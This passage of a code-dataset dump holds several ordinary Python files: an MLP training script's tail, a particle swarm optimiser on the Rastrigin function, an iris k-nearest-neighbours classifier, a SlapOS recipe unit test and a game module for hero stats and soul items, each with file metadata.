norm_y.fit_transform(y_train)\n y_test = norm_y.transform(y_test)\n\n rna.fit(X_train, y_train)\n s = rna.score(X_test, y_test)\n print(\"score: {}\".format(s))\n \n y_pred = rna.predict(X_test)\n print(norm_y.inverse_transform(y_test))\n print(norm_y.inverse_transform(y_pred))\n rna.save(\"mlp.model\")\n\n with MLP() as rna:\n rna.load(\"mlp.model\")\n y_pred = rna.predict(X_test)\n print(norm_y.inverse_transform(y_pred))\n", "sub_path": "mlp/mlp.py", "file_name": "mlp.py", "file_ext": "py", "file_size_in_byte": 16655, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "tensorflow.identity", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.variance_scaling_initializer", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.zeros_initializer", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.squared_difference", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorflow.InteractiveSession", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.finfo", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 140, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 145, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 164, 
"usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 210, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 234, "usage_type": "call"}, {"api_name": "os.path", "line_number": 234, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 242, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 247, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 256, "usage_type": "call"}, {"api_name": "tensorflow.InteractiveSession", "line_number": 336, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 338, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 338, "usage_type": "attribute"}, {"api_name": "tensorflow.InteractiveSession", "line_number": 349, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 383, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 385, "usage_type": "attribute"}, {"api_name": "tensorflow.identity", "line_number": 387, "usage_type": "attribute"}, {"api_name": "tensorflow.round", "line_number": 389, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 394, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 442, "usage_type": "attribute"}, {"api_name": "sklearn.datasets.load_linnerud", "line_number": 446, "usage_type": "call"}, {"api_name": "sklearn.model_selection.ShuffleSplit", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 457, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 459, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 461, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 462, "usage_type": "call"}]} {"seq_id": "282300043", "text": "# File: pso_rastrigin.py\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport math\n\n# N-Dimensional Rastrigin function\ndef rastrigin(*X):\n dim = len(X)\n return 10*dim + sum([(x**2 - 10 * np.cos(2 * np.pi * x)) for x in X])\n\n# Usual limits for evaluate the Rastrigin function\nlower_limit=-5.12\nupper_limit=5.12\n\n# We'll use 10 particles in a 2D space\nn_particles=10\nn_dimensions=2\n\n\n# Initialize the particle positions and their velocities\nP = lower_limit + (upper_limit - lower_limit) * np.random.rand(n_particles, n_dimensions)\nassert P.shape == (n_particles, n_dimensions)\nV = np.zeros(P.shape)\n \n# Initialize the global and local fitness to the worst possible\nfitness_gbest = np.inf\nfitness_lbest = fitness_gbest * np.ones(n_particles)\n\n# Initialize the best local and global points\nP_lbest=1*P\nP_gbest= 
1*P_lbest[0]\n\nfitness_P = np.zeros(P.shape)\n\nfor I in range(0, n_particles):\n    if rastrigin(P_lbest[I][0],P_lbest[I][1]) < rastrigin(P_gbest[0],P_gbest[1]):\n        P_gbest=1*P_lbest[I]\n\ndef iteration():\n    \n    global P,P_lbest,P_gbest,V\n    weight=0.9\n    C1=0.3\n    C2=0.2\n    g_best = rastrigin(P_gbest[0],P_gbest[1])\n    print(\"Best particle in:\",P_gbest,\" gbest: \",g_best)\n    \n    # Update the particle velocity and position\n    for I in range(0, n_particles):\n        for J in range(0, n_dimensions):\n            R1 = np.random.rand() # Uniform random number\n            R2 = np.random.rand() # Uniform random number    \n            V[I][J] = (weight*V[I][J]\n                       + C1*R1*(P_lbest[I][J] - P[I][J]) \n                       + C2*R2*(P_gbest[J] - P[I][J]))\n            P[I][J] = P[I][J] + V[I][J]\n        if rastrigin(P[I][0],P[I][1]) < rastrigin(P_lbest[I][0],P_lbest[I][1]):\n            P_lbest[I]=1*P[I]\n\n        if rastrigin(P_lbest[I][0],P_lbest[I][1]) < rastrigin(P_gbest[0],P_gbest[1]):\n            P_gbest=1*P_lbest[I]\n    \nif __name__ == '__main__':\n    \n    it_max = 1\n    while it_max <= 1000:\n        print(\"Iteration: \",it_max)\n        iteration()\n        it_max += 1\n\n    # Plot the results\n    fig = plt.figure()\n    ax = fig.gca(projection='3d')\n    plt.title(\"Rastrigin Function\")\n    X = np.linspace(-5.12, 5.12, 200)    \n    Y = np.linspace(-5.12, 5.12, 200)    \n    X, Y = np.meshgrid(X, Y)\n    Z = rastrigin(X, Y)\n\n    surf = ax.plot_surface(X, Y, Z, \n                           rstride=1, cstride=1, cmap=cm.plasma, \n                           linewidth=0, antialiased=False)\n\n    ax.set_xlabel('$x$')\n    ax.set_ylabel('$y$')\n    ax.set_zlabel('$z$')\n    fig.colorbar(surf)\n    best = rastrigin(P_gbest[0], P_gbest[1])\n    ax.plot([0,P_gbest[0]],[0,P_gbest[1]],[100,best],color='black')\n    ax.scatter(0., 0., 100., c='green', marker='o')\n    ax.scatter(P_gbest[0], P_gbest[1], best, c='black', marker='^')\n    text = '\nBest particle at: ('+str(P_gbest[0])+','+str(P_gbest[1])+')'\n    ax.text2D(0.5,0,text,ha='center',va='top',transform=ax.transAxes)\n    plt.show()", "sub_path": "Practica-6/pso_rastrigin.py", "file_name": "pso_rastrigin.py", "file_ext": "py", "file_size_in_byte": 2961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "numpy.cos", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 55, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.cm.plasma", 
"line_number": 84, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}]} {"seq_id": "366969403", "text": "from sklearn.datasets import load_iris\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\nfrom argparse import ArgumentParser\nimport numpy as np\nimport math\niris = load_iris()\n\nparser = ArgumentParser()\nparser.add_argument(\"-k\", type=int, action=\"store\", dest=\"k_value\")\nparser.add_argument(\"--print-guesses\", action=\"store_true\", dest=\"print_guesses\")\nparser.add_argument('kvals', metavar='N', type=int, nargs='+')\nargs = parser.parse_args()\n\nx_iris, y_iris = iris.data, iris.target\nx_names, y_names = iris.feature_names, iris.target_names\n\nnormalizador = StandardScaler().fit(x_iris)\nXn_iris = normalizador.transform(x_iris)\n\nx_train, x_test, y_train, y_test = train_test_split(x_iris, y_iris, test_size = 0.25)\n\ndef l2_dist(p, q):\n squares_sum = 0.0\n n = len(p)\n if n != len(q):\n raise ValueError(\"Oh noes!\")\n for i in (i for i in range(n)):\n squares_sum += (p[i] - q[i])**2\n return math.sqrt(squares_sum)\n\ndef f(D, x, k):\n dist = []\n labels = []\n i = 0\n for val in D:\n dist.append((l2_dist(val, x), i))\n i += 1\n dist.sort(key = lambda t: t[0])\n\n for i in range(k):\n labels.append(y_train[dist[i][1]])\n return max(labels, key=labels.count), (labels.count(max(labels, key=labels.count))/k)*100, \n\nfor k_value in args.kvals:\n percentages = []\n for i in range(10):\n if(args.print_guesses):\n print(\"%-15s%-15s%-15s\"%(\"Etiqueta\", \"Correcta\", \"Certeza\"))\n correct_labelling_count = 0\n for i in range(len(x_test)):\n l, p = f(x_train, x_test[i], k_value)\n correct_label = y_test[i]\n if(args.print_guesses):\n print(\"%-15i%-15i%-15.2f\"%(l, correct_label, p))\n if l == correct_label:\n correct_labelling_count += 1\n percentages.append(correct_labelling_count/len(x_test))\n percentages = np.array(percentages, dtype=float)\n\n print(\"K = %i\"%(k_value))\n print(\"Media = %.2f%%\"%(percentages.mean()*100))\n print(\"Desv. Est. 
= %.2f\"%(percentages.std()))", "sub_path": "Patrones/Clase10/ex3.py", "file_name": "ex3.py", "file_ext": "py", "file_size_in_byte": 2128, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 8, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 22, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}]} {"seq_id": "145715049", "text": "import os\nimport sys\nimport unittest\n\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nfrom slapos.recipe import generic_cloudooo\n\nclass TestGenericCloudooo(unittest.TestCase):\n def new_recipe(self, options):\n buildout = {\n 'buildout': {\n 'bin-directory': '',\n 'find-links': '',\n 'allow-hosts': '',\n 'develop-eggs-directory': '',\n 'eggs-directory': '',\n 'python': 'testpython',\n },\n 'testpython': {\n 'executable': sys.executable,\n },\n 'slap-connection': {\n 'computer-id': '',\n 'partition-id': '',\n 'server-url': '',\n 'software-release-url': '',\n }\n }\n return generic_cloudooo.Recipe(buildout=buildout, name='generic_cloudooo', options=options)\n\n def setUp(self):\n self.test_dir = mkdtemp()\n def tearDown(self):\n if os.path.exists(self.test_dir):\n rmtree(self.test_dir)\n\n def test_install(self):\n # Basic check\n config_file_path = os.path.join(self.test_dir, \"test_install_configuration_file_etc_cloudooo-X.cfg\")\n recipe = self.new_recipe({\n \"ip\": \"test_install_ip\",\n \"environment\": \"test_install=environment\",\n \"mimetype_entry_addition\": \"text/install mimetype/entry addition\",\n \"ooo-binary-path\": \"test_install_ooo_binary_path\",\n \"ooo-paster\": \"test_install_ooo_paster\",\n \"ooo-uno-path\": \"test_ooo_uno_path\",\n \"port\": \"123\",\n \"openoffice-port\": \"234\",\n \"configuration-file\": config_file_path,\n \"data-directory\": os.path.join(self.test_dir, \"test_install_data_directory_srv_cloudooo-X\"),\n \"wrapper\": os.path.join(self.test_dir, \"test_install_wrapper_service_cloudooo-X\"),\n })\n recipe.install()\n data = open(config_file_path).read()\n self.assertIn(\"[app:main]\", data)\n self.assertIn(\"[server:main]\", data)\n\n # Check if mimetype_registry is well ordered\n self.assertIn(\"\\n text/install mimetype/entry addition\\n text/* * ooo\\n\", data)\n\n # Check OnlyOffice entries\n self.assertIn(\"\\n\".join([\n \"\",\n \" application/vnd.openxmlformats-officedocument.presentationml.presentation application/x-asc-presentation x2t\",\n \" application/vnd.openxmlformats-officedocument.spreadsheetml.sheet application/x-asc-spreadsheet x2t\",\n \" application/vnd.openxmlformats-officedocument.wordprocessingml.document application/x-asc-text x2t\",\n \"\",\n ]), data)\n self.assertIn(\"\\n\".join([\n \"\",\n \" application/x-asc-presentation application/vnd.openxmlformats-officedocument.presentationml.presentation x2t\",\n \" application/x-asc-spreadsheet application/vnd.openxmlformats-officedocument.spreadsheetml.sheet x2t\",\n \" application/x-asc-text application/vnd.openxmlformats-officedocument.wordprocessingml.document x2t\",\n \"\",\n ]), data)\n", "sub_path": "slapos/test/recipe/test_generic_cloudooo.py", "file_name": "test_generic_cloudooo.py", 
"file_ext": "py", "file_size_in_byte": 2803, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 21, "usage_type": "attribute"}, {"api_name": "slapos.recipe.generic_cloudooo.Recipe", "line_number": 30, "usage_type": "call"}, {"api_name": "slapos.recipe.generic_cloudooo", "line_number": 30, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}]} {"seq_id": "597390721", "text": "# -*- coding: utf-8 -*-\n\n__author__ = 'Wang Chao'\n__date__ = '12/30/13'\n\n\nfrom mongoengine import DoesNotExist\nfrom core.mongoscheme import MongoHero, MongoAchievement, MongoHeroSoul, MongoCharacter\nfrom core.signals import hero_add_signal, hero_changed_signal, hero_step_up_signal, hero_to_soul_signal\nfrom core.formation import Formation\nfrom core.exception import SanguoException\nfrom core.resource import Resource\nfrom utils import cache\nfrom core.msgpipe import publish_to_char\nfrom utils import pack_msg\nfrom utils.functional import id_generator\nfrom preset.settings import HERO_MAX_STEP, HERO_START_STEP, HERO_STEP_UP_SOCKET_AMOUNT\nfrom preset.data import HEROS, ACHIEVEMENTS, MONSTERS\nfrom preset import errormsg\nimport protomsg\n\nfrom dll import external_calculate\n\ndef char_heros_dict(char_id):\n heros = MongoHero.objects.filter(char=char_id)\n return {h.id: h for h in heros}\n\ndef char_heros_obj(char_id):\n heros = char_heros_dict(char_id)\n return [Hero.cache_obj(i) for i in heros.keys()]\n\n\ndef cal_hero_property(original_id, level, step):\n \"\"\"\n\n @param original_id: hero original id\n @type original_id: int\n @param level: hero level (char level)\n @type level: int\n @return: (attack, defense, hp)\n @rtype: tuple\n \"\"\"\n hero = HEROS[original_id]\n\n attack = external_calculate.Hero.attack(level, step, hero.quality, hero.attack_growing)\n defense = external_calculate.Hero.defense(level, step, hero.quality, hero.defense_growing)\n hp = external_calculate.Hero.hp(level, step, hero.quality, hero.hp_growing)\n\n return attack, defense, hp\n\n\ndef cal_monster_property(oid, level):\n monster = MONSTERS[oid]\n\n attack = external_calculate.Hero.attack(level, 0, monster.quality, monster.attack)\n defense = external_calculate.Hero.defense(level, 0, monster.quality, monster.defense)\n hp = external_calculate.Hero.hp(level, 0, monster.quality, monster.hp)\n\n return attack, defense, hp\n\n\nclass FightPowerMixin(object):\n @property\n def power(self):\n a = self.attack * 2.5 * (1 + self.crit / 200.0)\n # b = (self.hp + self.defense * 5) * (1 + self.dodge / 2.0)\n b = self.hp + self.defense * 5\n return int(a + b)\n\n\nclass Hero(FightPowerMixin):\n def __init__(self, hid):\n self.hero = MongoHero.objects.get(id=hid)\n char = 
MongoCharacter.objects.get(id=self.hero.char)\n\n self.id = hid\n self.oid = self.hero.oid\n self.step = self.hero.step\n self.progress = self.hero.progress\n self.level = char.level\n self.char_id = char.id\n\n self.attack, self.defense, self.hp = \\\n cal_hero_property(self.oid, self.level, self.step)\n\n self.model_hero = HEROS[self.oid]\n self.crit = self.model_hero.crit\n self.dodge = self.model_hero.dodge\n self.anger = self.model_hero.anger\n\n self.default_skill = self.model_hero.default_skill\n\n self.skills = [int(i) for i in self.model_hero.skills.split(',')]\n\n self._add_equip_attrs()\n self._add_achievement_buffs()\n\n def _add_equip_attrs(self):\n from core.item import Equipment\n f = Formation(self.char_id)\n socket = f.find_socket_by_hero(self.id)\n if not socket:\n return\n\n # 先把装备数值加到人物上\n equipments = []\n for x in ['weapon', 'armor', 'jewelry']:\n equip_id = getattr(socket, x)\n if equip_id:\n equip = Equipment(self.char_id, equip_id)\n self.attack += equip.attack\n self.defense += equip.defense\n self.hp += equip.hp\n\n equipments.append(equip)\n\n # 然后加成人物的专属装备\n additions = {}\n special_equipments = self.model_hero.special_equipments\n if special_equipments:\n for equip in equipments:\n _cls = equip.equip.cls\n if _cls not in special_equipments:\n continue\n\n _tp = equip.equip.tp\n additions[_tp] = additions.get(_tp, 0) + special_equipments[_cls]\n\n for _tp, _add_percent in additions.items():\n if _tp == 1:\n # attack\n self.attack *= (1 + _add_percent / 100.0)\n elif _tp == 2:\n # defense\n self.defense *= (1 + _add_percent / 100.0)\n else:\n # hp\n self.hp *= (1 + _add_percent / 100.0)\n self.hp = int(self.hp)\n\n # 最后再把宝石加上\n for equip in equipments:\n for k, v in equip.gem_attributes.iteritems():\n value = getattr(self, k)\n setattr(self, k, value + v)\n\n\n def _add_achievement_buffs(self):\n try:\n mongo_ach = MongoAchievement.objects.get(id=self.char_id)\n except DoesNotExist:\n return\n\n buffs = {}\n for i in mongo_ach.complete:\n ach = ACHIEVEMENTS[i]\n if not ach.buff_used_for:\n continue\n\n buffs[ach.buff_used_for] = buffs.get(ach.buff_used_for, 0) + ach.buff_value\n\n for k, v in buffs.iteritems():\n value = getattr(self, k)\n if k == 'crit':\n new_value = value + v / 100\n else:\n new_value = value * (1 + v / 10000.0)\n\n new_value = int(new_value)\n setattr(self, k, new_value)\n\n\n def save_cache(self):\n cache.set('hero:{0}'.format(self.id), self)\n\n @staticmethod\n def cache_obj(hid):\n h = cache.get('hero:{0}'.format(hid))\n if h:\n return h\n\n h = Hero(hid)\n h.save_cache()\n return h\n\n\n @property\n def max_socket_amount(self):\n # 当前升阶全部孔数\n if self.step >= HERO_MAX_STEP:\n return 0\n return HERO_STEP_UP_SOCKET_AMOUNT[self.step]\n\n @property\n def current_socket_amount(self):\n # 当前已经点亮的孔数\n return self.hero.progress\n\n\n def step_up(self):\n # 升阶\n if self.step >= HERO_MAX_STEP:\n raise SanguoException(\n errormsg.HERO_REACH_MAX_STEP,\n self.char_id,\n \"Hero Step Up\",\n \"Hero {0} reach max step {1}\".format(self.id, HERO_MAX_STEP)\n )\n\n resource_needs = {}\n cost_gold = external_calculate.Hero.step_up_using_gold(self.model_hero.quality)\n\n resource_needs['gold'] = -cost_gold\n soul_needs_amount = external_calculate.Hero.step_up_using_soul_amount(self.model_hero.quality)\n\n hs = HeroSoul(self.char_id)\n self_soul_amount = hs.soul_amount(self.oid)\n\n common_soul_needs = soul_needs_amount - self_soul_amount\n if common_soul_needs <= 0:\n # don't need common soul\n resource_needs['souls'] = [(self.oid, soul_needs_amount)]\n 
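Stripped of the equipment and achievement buffs, the power property in the hero.py record above reduces to one closed-form score. A standalone restatement with made-up stats; the weights come from FightPowerMixin, the numbers are illustrative:

def fight_power(attack, defense, hp, crit):
    # power = attack * 2.5 * (1 + crit/200) + hp + defense * 5, per FightPowerMixin
    a = attack * 2.5 * (1 + crit / 200.0)
    b = hp + defense * 5
    return int(a + b)

# attack=100, crit=20 -> 250 * 1.1 = 275; hp=500 plus defense 40*5 = 700; total 975
assert fight_power(100, 40, 500, 20) == 975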
else:\n # need common soul\n resource_needs['stuffs'] = [(22, common_soul_needs)]\n\n resource = Resource(self.char_id, \"Hero Step Up\", 'step up {0}'.format(self.id))\n try:\n resource.check_and_remove(**resource_needs)\n except SanguoException as e:\n if e.error_id == errormsg.SOUL_NOT_ENOUGH or e.error_id == errormsg.STUFF_NOT_ENOUGH:\n raise SanguoException(\n errormsg.HERO_STEP_UP_ALL_NOT_ENOUGH,\n self.char_id,\n \"Hero Step Up\",\n \"soul not enough\"\n )\n raise e\n\n # 扣完东西了,开始搞一次\n self.hero.progress += 1\n if self.hero.progress >= self.max_socket_amount:\n # 真正的升阶\n # 否则仅仅是记录当前状态\n self.hero.step += 1\n self.hero.progress = 0\n\n hero_step_up_signal.send(\n sender=None,\n char_id=self.char_id,\n hero_id=self.id,\n new_step=self.hero.step\n )\n\n self.step = self.hero.step\n self.hero.save()\n hero_changed_signal.send(\n sender=None,\n hero_id=self.id\n )\n\n\nclass HeroSoul(object):\n def __init__(self, char_id):\n self.char_id = char_id\n try:\n self.mongo_hs = MongoHeroSoul.objects.get(id=self.char_id)\n except DoesNotExist:\n self.mongo_hs = MongoHeroSoul(id=self.char_id)\n self.mongo_hs.souls = {}\n self.mongo_hs.save()\n\n def soul_amount(self, _id):\n return self.mongo_hs.souls.get(str(_id), 0)\n\n def has_soul(self, _id, amount=1):\n return self.soul_amount(_id) >= amount\n\n def add_soul(self, souls):\n new_souls = []\n update_souls = []\n for _id, amount in souls:\n str_id = str(_id)\n if str_id in self.mongo_hs.souls:\n self.mongo_hs.souls[str_id] += amount\n update_souls.append((_id, self.mongo_hs.souls[str_id]))\n else:\n self.mongo_hs.souls[str_id] = amount\n new_souls.append((_id, amount))\n\n self.mongo_hs.save()\n if new_souls:\n msg = protomsg.AddHeroSoulNotify()\n for _id, amount in new_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n if update_souls:\n msg = protomsg.UpdateHeroSoulNotify()\n for _id, amount in update_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def remove_soul(self, souls):\n remove_souls = []\n update_souls = []\n for _id, amount in souls:\n if not self.has_soul(_id, amount):\n raise SanguoException(\n errormsg.SOUL_NOT_ENOUGH,\n self.char_id,\n \"HeroSoul Remove\",\n \"HeroSoul {0} not enough/exist, expected amount {1}\".format(_id, amount)\n )\n\n for _id, amount in souls:\n str_id = str(_id)\n self.mongo_hs.souls[str_id] -= amount\n if self.mongo_hs.souls[str_id] <= 0:\n remove_souls.append(_id)\n self.mongo_hs.souls.pop(str_id)\n else:\n update_souls.append((_id, self.mongo_hs.souls[str_id]))\n\n self.mongo_hs.save()\n if remove_souls:\n msg = protomsg.RemoveHeroSoulNotify()\n msg.ids.extend(remove_souls)\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n if update_souls:\n msg = protomsg.UpdateHeroSoulNotify()\n for _id, amount in update_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def purge_soul(self, _id):\n self.mongo_hs.souls.pop(str(_id))\n self.mongo_hs.save()\n\n msg = protomsg.RemoveHeroSoulNotify()\n msg.ids.append(_id)\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def send_notify(self):\n msg = protomsg.HeroSoulNotify()\n for _id, amount in self.mongo_hs.souls.iteritems():\n s = msg.herosouls.add()\n s.id = int(_id)\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\nclass _SaveHeroResult(object):\n __slots__ = ['id_range', 'actual_heros', 'to_souls']\n\nclass 
_FakeSaveHeroResult(object):\n __slots__ = ['id_range', 'actual_heros', 'to_souls']\n def __init__(self):\n self.id_range = []\n self.actual_heros = []\n self.to_souls = []\n\n def __bool__(self):\n return False\n __nonzero__ = __bool__\n\n\nFakeSaveHeroResult = _FakeSaveHeroResult()\n\n\n\ndef get_char_hero_oids(char_id):\n heros = MongoHero.objects.filter(char=char_id)\n return [h.oid for h in heros]\n\ndef save_hero(char_id, hero_original_ids, add_notify=True):\n if not isinstance(hero_original_ids, (list, tuple)):\n hero_original_ids = [hero_original_ids]\n\n char_hero_oids = get_char_hero_oids(char_id)\n\n to_soul_hero_ids = []\n for h in hero_original_ids[:]:\n if h in char_hero_oids:\n to_soul_hero_ids.append(h)\n hero_original_ids.remove(h)\n\n souls = {}\n if to_soul_hero_ids:\n for sid in to_soul_hero_ids:\n this_hero = HEROS[sid]\n souls[this_hero.id] = souls.get(this_hero.id, 0) + 1\n\n for k in souls.keys():\n souls[k] *= external_calculate.Hero.step_up_using_soul_amount(HEROS[k].quality)\n\n hs = HeroSoul(char_id)\n hs.add_soul(souls.items())\n\n hero_to_soul_signal.send(\n sender=None,\n char_id=char_id,\n souls=souls.items(),\n )\n\n id_range = []\n if hero_original_ids:\n length = len(hero_original_ids)\n id_range = id_generator('charhero', length)\n for i, _id in enumerate(id_range):\n MongoHero(id=_id, char=char_id, oid=hero_original_ids[i], step=HERO_START_STEP, progress=0).save()\n\n hero_add_signal.send(\n sender=None,\n char_id=char_id,\n hero_ids=id_range,\n hero_original_ids=hero_original_ids,\n send_notify=add_notify,\n )\n\n res = _SaveHeroResult()\n res.id_range = id_range\n res.actual_heros = [(oid, 1) for oid in hero_original_ids]\n res.to_souls = souls.items()\n return res\n\n\ndef recruit_hero(char_id, _id):\n if _id not in HEROS:\n raise SanguoException(\n errormsg.SOUL_CAN_NOT_RECRUIT,\n char_id,\n \"Recruit Hero\",\n \"Soul {0} not exist\".format(_id)\n )\n\n char_hero_oids = get_char_hero_oids(char_id)\n if _id in char_hero_oids:\n raise SanguoException(\n errormsg.SOUL_CAN_NOT_RECRUIT,\n char_id,\n \"Recruit Hero\",\n \"Hero {0} already exist\".format(_id)\n )\n\n\n soul_amount = external_calculate.Hero.step_up_using_soul_amount(HEROS[_id].quality)\n hs = HeroSoul(char_id)\n hs.remove_soul([(_id, soul_amount)])\n\n save_hero(char_id, [_id])\n\n", "sub_path": "sanguo/core/hero.py", "file_name": "hero.py", "file_ext": "py", "file_size_in_byte": 14254, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": 